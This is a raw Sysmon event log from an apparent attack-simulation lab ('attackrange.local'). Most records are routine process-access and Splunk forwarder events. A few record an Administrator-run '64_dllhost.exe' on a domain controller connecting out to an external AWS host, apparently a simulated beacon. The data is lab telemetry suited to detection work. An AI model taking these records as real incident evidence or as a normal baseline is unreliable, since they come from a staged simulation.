19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606638Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606637Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606636Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606635Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606634Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606633Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606632Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606631Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606630Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606629Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606628Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606627Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606626Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C9-607D-F200-00000000BB01}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606625Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C8-607D-ED00-00000000BB01}2568C:\Windows\system32\sihost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606624Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C8-607D-ED00-00000000BB01}2568C:\Windows\system32\sihost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606623Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C8-607D-ED00-00000000BB01}2568C:\Windows\system32\sihost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001606622Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.114{21761711-83AE-607D-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{21761711-84C8-607D-ED00-00000000BB01}2568C:\Windows\system32\sihost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001606666Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:01.101{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606665Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:01.101{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD438E5ADE3F9F657B0CB4A98872F4F3,SHA256=B5532CB25E2DCAD294B315354D9D8A200E34A4FEC3B35269C572C4B235AF64E5falsefalse - insufficient disk space 354300x80000000000000001095354Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:56.166{761B69BB-660F-6080-305D-00000000BA01}384C:\Windows\System32\dllhost.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-982.attackrange.local1164-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x80000000000000001095353Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:01.532{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095352Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:01.532{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095351Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:01.040{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0094692D8AE8A6B6845EC70AAC96F56,SHA256=CDCF13C77579CA8D17263EADBCFE51F504A4320F51BE03BD5CAA231C944D8542,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606672Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:02.119{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606671Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:02.119{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E9AE2F20F7D5040B70BC9AA3FFC40AF,SHA256=4CDD41B316CD96C169A68B2C0A4098A645DF8375DAA5D85CF89B407DAC0AEA7Cfalsefalse - insufficient disk space 354300x80000000000000001095358Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:58.438{761B69BB-65B6-6080-265D-00000000BA01}2304C:\Users\Administrator\Desktop\64_dllhost.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-982.attackrange.local1165-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x80000000000000001095357Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:02.533{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095356Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:02.533{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095355Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:02.046{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A5388CCFA9A477E9E5E0D94D8CD76F4,SHA256=02DE352EA862646753D7405E64330D72D4F945923E9CE7752946ADC4CFE9C6BC,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606670Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:02.088{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606669Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:02.088{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD1F1147D1D793939BC56600578BA460,SHA256=59DFD2FBCB98C938E076B44539A6B83C8C9887973FE6CB8D46379A7D9D3877C2falsefalse - insufficient disk space 11241100x80000000000000001606668Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:02.088{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606667Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:02.088{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26211F6EB429C67CE4494899646FD09A,SHA256=865D02890602891040F572D8AF9507549AE25DD0941C1FED8A7D7F297BD29999falsefalse - insufficient disk space 354300x80000000000000001606675Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:00.613{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49738-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606674Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:03.121{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606673Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:03.121{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DD901B8359236CC5117A738F2DAE6AA,SHA256=CE131C7E9B271E4F1E85DAD873DDD10167590A168AEE30F64D6991ABE641D966falsefalse - insufficient disk space 10341000x80000000000000001095362Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:03.534{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095361Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:03.534{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095360Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:03.064{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C4DCA14B2B9B5D4BC1A716D329B8FDFC,SHA256=292C779B657773EF9813197F518E742A13B081F7110BF470D60980278715FE2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095359Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:19:03.052{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E4FFD1E56BB67C9E7F96A855BF42C0B,SHA256=9F124DD5EBA1C0B823FE34E65743672CB35FDC0B6F3D980EA11F2441D69F44D8,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606677Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:19:04.140{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606676Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 